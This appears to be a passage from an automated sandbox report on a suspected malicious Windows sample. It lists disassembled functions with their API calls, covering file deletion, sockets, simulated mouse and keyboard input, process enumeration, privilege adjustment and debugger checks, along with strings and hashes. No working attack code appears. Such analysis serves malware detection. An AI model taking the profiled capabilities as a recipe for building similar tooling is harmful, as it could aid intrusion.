Part of subcall function 00BB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB3A97,?,?,00BB2E7F,?,?,?,00000000), ref: 00BB3AC2

Part of subcall function 00C1E199: GetFileAttributesW.KERNEL32(?,00C1CF95), ref: 00C1E19A

FindFirstFileW.KERNEL32(?,?), ref: 00C1D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C1D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1D481
FindClose.KERNEL32(00000000), ref: 00C1D498
FindClose.KERNEL32(00000000), ref: 00C1D4A1

Strings

\*.*, xrefs: 00C1D3F2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 66bd500d0186d2f6cf099c736de97922e42df56bebded8527f2237b36c4e3116
Instruction ID: 439c5cb4ab946c749406b8f1cab3aa5227e16811e53ef528f032aad5f98d2d6f
Opcode Fuzzy Hash: 66bd500d0186d2f6cf099c736de97922e42df56bebded8527f2237b36c4e3116
Instruction Fuzzy Hash: 0B317031009341ABC314EF64D8919FF77E8BE96300F444A5DF4D2921A1EBA0EA49D763

Function 00BEE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00BEE645

Strings

1#INF, xrefs: 00BEF852
1#IND, xrefs: 00BEF83D
1#QNAN, xrefs: 00BEF84B
1#SNAN, xrefs: 00BEF844

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 13f4ddfcd36951c0da0520b5bad09ad6f87a84494ca038bf34ee8002872dc890
Instruction ID: 1531563f4103da3a10ef3d12b9cd104e4a3273b878d8c21ff17b997690b4ff58
Opcode Fuzzy Hash: 13f4ddfcd36951c0da0520b5bad09ad6f87a84494ca038bf34ee8002872dc890
Instruction Fuzzy Hash: 87C24971E046698FDB25CE29DD807EAB7F5EB48305F1441EAD81EE7241E774AE818F40

Function 00C2648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C264DC
CoInitialize.OLE32(00000000), ref: 00C26639
CoCreateInstance.OLE32(00C4FCF8,00000000,00000001,00C4FB68,?), ref: 00C26650
CoUninitialize.OLE32 ref: 00C268D4

Strings

.lnk, xrefs: 00C264BA, 00C26524, 00C265E0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 88c116a728eb007deb69544b0e34bf7ea5b9ae516afb6bff508eacfd341d1dcf
Instruction ID: 5889b30ceaf7db09ad68060841de2fefb8e7c6da89519aa232172ac6c7366d3b
Opcode Fuzzy Hash: 88c116a728eb007deb69544b0e34bf7ea5b9ae516afb6bff508eacfd341d1dcf
Instruction Fuzzy Hash: A4D14B715083119FC314EF24C881AABB7E9FF94704F1049ADF5958B2A1EB70EE45CBA2

Function 00C322DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00C322E8

Part of subcall function 00C2E4EC: GetWindowRect.USER32(?,?), ref: 00C2E504

GetDesktopWindow.USER32 ref: 00C32312
GetWindowRect.USER32(00000000), ref: 00C32319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C32355
GetCursorPos.USER32(?), ref: 00C32381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C323DF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: fcc4bbc3000d46d9e429d2ce58485dd7e25097b9e500c953152150097c3529b4
Instruction ID: de52f876ac869e482c79db9072629c3bb7019d38c8f193441407fce2352bb5df
Opcode Fuzzy Hash: fcc4bbc3000d46d9e429d2ce58485dd7e25097b9e500c953152150097c3529b4
Instruction Fuzzy Hash: 8C31ED72505315ABDB60DF14D848B9FBBADFF85310F000919F995D71A1DB34EA08CB92

Function 00C29B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C29B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C29C8B

Part of subcall function 00C23874: GetInputState.USER32 ref: 00C238CB
Part of subcall function 00C23874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C23966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C29BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C29C75

Strings

*.*, xrefs: 00C29B5D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 77452d2f390a32d03cbc0f927d193397cfca9b91638fa112d7fa9cc3dd546b66
Instruction ID: bb4d88306147fafdcf2bd3da27038d209141ab8a230112827c99411235bdc76e
Opcode Fuzzy Hash: 77452d2f390a32d03cbc0f927d193397cfca9b91638fa112d7fa9cc3dd546b66
Instruction Fuzzy Hash: 5D41827190521AAFDF55DF64D885AEEBBF4FF05310F2440AAE815A21A1EB709F84CF60

Function 00BB8060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00BB813C
VUUU, xrefs: 00BB843C
VUUU, xrefs: 00BB83FA
VUUU, xrefs: 00BB83E8
64000000668955c8b86c000000668945cab96c00000066894dccba2e000000668955ceb864000000668945d0b96c00000066894dd2ba6c000000668955d433c066, xrefs: 00BF5D0F
VUUU, xrefs: 00BF5DF0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: 64000000668955c8b86c000000668945cab96c00000066894dccba2e000000668955ceb864000000668945d0b96c00000066894dd2ba6c000000668955d433c066$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2868949933
Opcode ID: d7890dfb5e8839d0e2c51db041e0c6f0cdacd22af3a98b5b4dc632e9ff060812
Instruction ID: b3fb9401c266dd417fb9d92ee805a338d3ef67587e448d2d47a4d4f817e84a6e
Opcode Fuzzy Hash: d7890dfb5e8839d0e2c51db041e0c6f0cdacd22af3a98b5b4dc632e9ff060812
Instruction Fuzzy Hash: 0DA24A70A0061ACBDF24CF58C9907FDB7F5EB54314F2481EAEA16A7285DBB09D85CB90

Function 00BC997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BC9A4E
GetSysColor.USER32(0000000F), ref: 00BC9B23
SetBkColor.GDI32(?,00000000), ref: 00BC9B36

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: fc992f29306e18c9f29f2be1de05e1764e27955cb962eb2437daa21bef48e63f
Instruction ID: 0e3c41a76dce99fa4b631301e37680348d445f5c766a92d4bf0fd087c1883574
Opcode Fuzzy Hash: fc992f29306e18c9f29f2be1de05e1764e27955cb962eb2437daa21bef48e63f
Instruction Fuzzy Hash: CAA10371608454BEF729AB2C8C8DF7F2ADDEB42340F15028DF512D66D1CA26AE01D776

Function 00C31806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C3307A
Part of subcall function 00C3304E: _wcslen.LIBCMT ref: 00C3309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C3185D
WSAGetLastError.WSOCK32 ref: 00C31884
bind.WSOCK32(00000000,?,00000010), ref: 00C318DB
WSAGetLastError.WSOCK32 ref: 00C318E6
closesocket.WSOCK32(00000000), ref: 00C31915

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 269b4dcb92fa6edaa00331c5600f06126d5081d0aaf6da8ca279f432887ad2de
Instruction ID: bac82ac43ff3fe4e3a92a787e62df03254a4909693df08dac3927c4c434f2c86
Opcode Fuzzy Hash: 269b4dcb92fa6edaa00331c5600f06126d5081d0aaf6da8ca279f432887ad2de
Instruction Fuzzy Hash: F3519175A10200AFDB10AF24C886F7A77E5AB45718F08809CF9169F3D3CB75AD41CBA1

Function 00C41C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C41CC0
IsWindowEnabled.USER32 ref: 00C41CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00C41CDB
IsIconic.USER32 ref: 00C41CE9
IsZoomed.USER32 ref: 00C41CF7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a0e555cc3c0a129095a9e737f755c29b95656e7062d0a679a16f39490bacc346
Instruction ID: 7614daaad57a5a8732a6d9985eb144ff5d791a58f6ac8c099848999838dd32a4
Opcode Fuzzy Hash: a0e555cc3c0a129095a9e737f755c29b95656e7062d0a679a16f39490bacc346
Instruction Fuzzy Hash: F3219F357412115FD7218F2ADCC4B6A7BE5FF85325B1D8068EC9A8B252CB71ED82CB90

Function 00C3A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C3A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00C3A6BA

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Process32NextW.KERNEL32(00000000,?), ref: 00C3A79C
CloseHandle.KERNEL32(00000000), ref: 00C3A7AB

Part of subcall function 00BCCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BF3303,?), ref: 00BCCE8A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: bd390580e141a62c511fac88ee2e05533c721b65b6c3241f9db5a9294100cd6e
Instruction ID: b486493452528e7d982cad8ce5677bad1804d6dd687c935153d2bbcec3273d7e
Opcode Fuzzy Hash: bd390580e141a62c511fac88ee2e05533c721b65b6c3241f9db5a9294100cd6e
Instruction Fuzzy Hash: E9514AB1508300AFD714EF24C886AAFBBE8FF89754F00495DF599972A1EB70D904CB92

Function 00C1AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C1AAAC
SetKeyboardState.USER32(00000080), ref: 00C1AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C1AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C1AB88

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d6d5c97741da1b213d3456536508fee9997e99c5145811eb19a81ab7e71eefba
Instruction ID: 041fb51e74a8964fa236968f1266cd26effa6d0890f8c24f7f55c9e8db96d5ff
Opcode Fuzzy Hash: d6d5c97741da1b213d3456536508fee9997e99c5145811eb19a81ab7e71eefba
Instruction Fuzzy Hash: 28312870A46288AFFB34CA65CC05BFE7BA6AF47310F04821AF091521E1D3758AC1F762

Function 00C2CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00C2CE89
GetLastError.KERNEL32(?,00000000), ref: 00C2CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00C2CEFE

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: bbe7fc1c87dd61e7d7447acd03f9270894fa245a59ee75bffcb73a7c7845f485
Instruction ID: 3927a980985595e5e9e9c3ab21e581d856a3da0c09814c70cc37182b4c39b0b5
Opcode Fuzzy Hash: bbe7fc1c87dd61e7d7447acd03f9270894fa245a59ee75bffcb73a7c7845f485
Instruction Fuzzy Hash: A521AFB15007159BDB30DFA5E988BABBBFCEB50358F10441EE556D2561EB70EE048B50

Function 00C18298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C182AA

Strings

|, xrefs: 00C182DA
(, xrefs: 00C182F0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: a9d85a5ad81c1ee08a35298247ba83ad48493ff2e340cfea807d5abe92930349
Instruction ID: aa5b4ecc7816819e023a0350bf2bbe48cda2a6ed215016da8a1de94cc14f6d16
Opcode Fuzzy Hash: a9d85a5ad81c1ee08a35298247ba83ad48493ff2e340cfea807d5abe92930349
Instruction Fuzzy Hash: 0C323874A047059FCB28CF59C081AAAB7F0FF48710B55C56EE5AADB3A1DB70E981DB40

Function 00C25C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C25CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00C25D17
FindClose.KERNEL32(?), ref: 00C25D5F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 8c63ef7a607ba7075d9310c46d4f49fd77553521d20663d1f76645ddc81e3268
Instruction ID: fb1f41bbf40cd54b56a645af3bf6cb5ca1ea7f066aabbb93dded152730c3df9f
Opcode Fuzzy Hash: 8c63ef7a607ba7075d9310c46d4f49fd77553521d20663d1f76645ddc81e3268
Instruction Fuzzy Hash: AC519A74604A019FC714CF28D494EAAB7E4FF49314F14859EE96A8B3A2DB70ED05CF91

Function 00BE2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00BE271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BE2724
UnhandledExceptionFilter.KERNEL32(?), ref: 00BE2731

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0f07bbc41ecd2fe740f0a5e3fb4a978af965f04439617a44d767ed63f4c0153c
Instruction ID: be6561e46d23e12d17676e07a6283c24984badadaec6a90f7f978fd22adc66dc
Opcode Fuzzy Hash: 0f07bbc41ecd2fe740f0a5e3fb4a978af965f04439617a44d767ed63f4c0153c
Instruction Fuzzy Hash: 2631B274911218ABCB21DF69DC897DDBBF8BF08310F5041EAE81CA6261E7709F818F45

Function 00C251CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C251DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C25238
SetErrorMode.KERNEL32(00000000), ref: 00C252A1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e958e1ba675297f75f9920452490037a572d4227c361155332559056bfe61257
Instruction ID: 01c166eabc62238f1a020c7f65bd593b72f0c5dad98ff2a6a47ce487902e11f8
Opcode Fuzzy Hash: e958e1ba675297f75f9920452490037a572d4227c361155332559056bfe61257
Instruction Fuzzy Hash: 99311A75A00518DFDB00DF54D884BAEBBB4FF49314F148099E909AB3A2DB71E955CB90

Function 00C116C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BD0668
Part of subcall function 00BCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BD0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C1173A
GetLastError.KERNEL32 ref: 00C1174A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 1565dbff03a9b849e6474e37815aed97f5668001fd81aab5f91f9f21143d29ec
Instruction ID: 76fb045778a52e80540d5f410e791556c53ea2da883d136528007ca824c45b54
Opcode Fuzzy Hash: 1565dbff03a9b849e6474e37815aed97f5668001fd81aab5f91f9f21143d29ec
Instruction Fuzzy Hash: 6D11CEB2410305AFD718AF54DCC6EAAB7F9FB05714B24856EF46653291EB70BC818A60

Function 00C1D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

